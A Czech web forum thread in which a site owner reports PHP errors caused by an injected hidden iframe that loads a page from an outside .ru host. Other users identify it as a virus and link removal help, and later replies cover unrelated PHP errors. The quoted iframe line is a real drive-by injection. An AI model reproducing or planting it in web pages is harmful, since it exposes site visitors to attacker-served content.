Autor Zpráva
VeronikaC
Profil
Ahoj, prosím, zda mi někdo nepomůže - pokud najedu na stránky, zobrazí se mi místo indexu hláška:

Parse error: syntax error, unexpected T_IF, expecting ',' or ';' in /data/web/virtuals/mujweb.cz/www/index.php on line 205

řádek číslo 205 vypadá takto:

echo "<body><iframe frameborder='0' onload="if (!this.src){ this.src='http://iqdoza.ru:8080/index.php'; this.height='0'; this.width='0';}" >wfwxsbhmvjwhrnpirimgvyqrbvxvthl</iframe>";


Děkuji moc za každou radu.

Veronika

Moderátor Alphard: Vkládej prosím kódy mezi značky [pre] a [/pre] (stačí kliknout na ).
Yur4Y
Profil
Predpokladám, že ten kód tam nevkladáte sama od seba... Máte na webu virus — co s tím?
Radek9
Profil
http://djpw.cz/vir
Edit: Zase pozdě :D
VeronikaC
Profil
Tedy děkuji všem za tak rychlé reakce.... Ano, na webu byl vir html framer. Takže jsem smazala iframe a zůstává na řádku pouze echo body?

ještě mi to hází chybu

Parse error: syntax error, unexpected T_STRING in /data/web/virtuals/mujweb.cz/www/index.php on line 51

echo "<?xml version='1.0' encoding='utf-8'?>\n"; ?>

Omlouvám se za úplně začátečnické dotazy, ale bohužel nemohu nikde dolovit tvůrce systému, je zabedněný....

Děkuji všem, jdu ještě prostudovat ty odkazy na viry Verča
VeronikaC
Profil
Tak iframe je snad odstraněn, jak jste psali děkuji moc, přečetla jsem článek a projela web ElbiaScan BETA a už se hlásí jako čistý, tak snad je to v pořádku.

Ještě k té chybě řádek 51, pokud se ho pokusím opravit na toto:

echo '<'?xml version="1.0" encoding="UTF-8"?>';

tak mi to vyhodí chybu:


setlocale(LC_ALL, 'cs_CZ.UTF8'); Header("Cache-Control: no-cache"); Header("Pragma: no-cache"); Header("Expires: ".GMDate("D, d M Y H:i:s")." GMT"); session_start(); require_once "include/variables.php"; // inicializace důležitých proměných prostředí require_once "lib/lib_fce.php"; // tato třída je určena převážně pro dědění, obsahuje různé konverzní fce,.. // vzor faktory pro PHP4 switch($_engine) { case "mysqli": require_once "lib/db_mysqli.php"; // inicializace důležitých proměných prostředí $db = new DB_Mysqli($_server, $_user, $_pass, $_database, $_encoding); break; case "mysql": require_once "lib/db_mysql.php"; // inicializace důležitých proměných prostředí $db = new DB_Mysql($_server, $_user, $_pass, $_database, $_encoding); break; } $sql = "SELECT vlastnost, hodnota FROM cms_konfigurace ORDER BY vlastnost"; $result = $db->query($sql); while($row = $db->fetch_object($result)) { $_CONF[$row->vlastnost] = stripslashes($row->hodnota); } // ======================== cleaner ============================ require_once "lib/lib_cleaner.php"; // zavoláme cleaner $user = new Cleaner($db, $_CONF); $user->Clean(); // ======================== cleaner ============================ if(!isset($_REQUEST["rubrika"])) { $_REQUEST["rubrika"] = "aktuality"; $pf = true; } else { $pf = false; } echo '<'?xml version="1.0" encoding="UTF-8"?>';
Fatal error: Call to a member function query() on a non-object in /data/web/virtuals/mujweb.cz/www/index.php on line 198



Děkuji za jakoukoli radu
king26
Profil
http://diskuse.jakpsatweb.cz/?action=vthread&forum=9&topic=2111

a odstavec Jak vložit XML deklaraci
Majkl578
Profil
Proč lidé neumí prvně číst a pak se až ptát...

Fatal error: Call to a member function query() on a non-object in /data/web/virtuals/mujweb.cz/www/index.php on line 198

V souboru index.php na řádku 198 se volá metoda query() na proměnné, která neobsahuje instanci objektu.

Vaše odpověď

Mohlo by se hodit


Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm:

0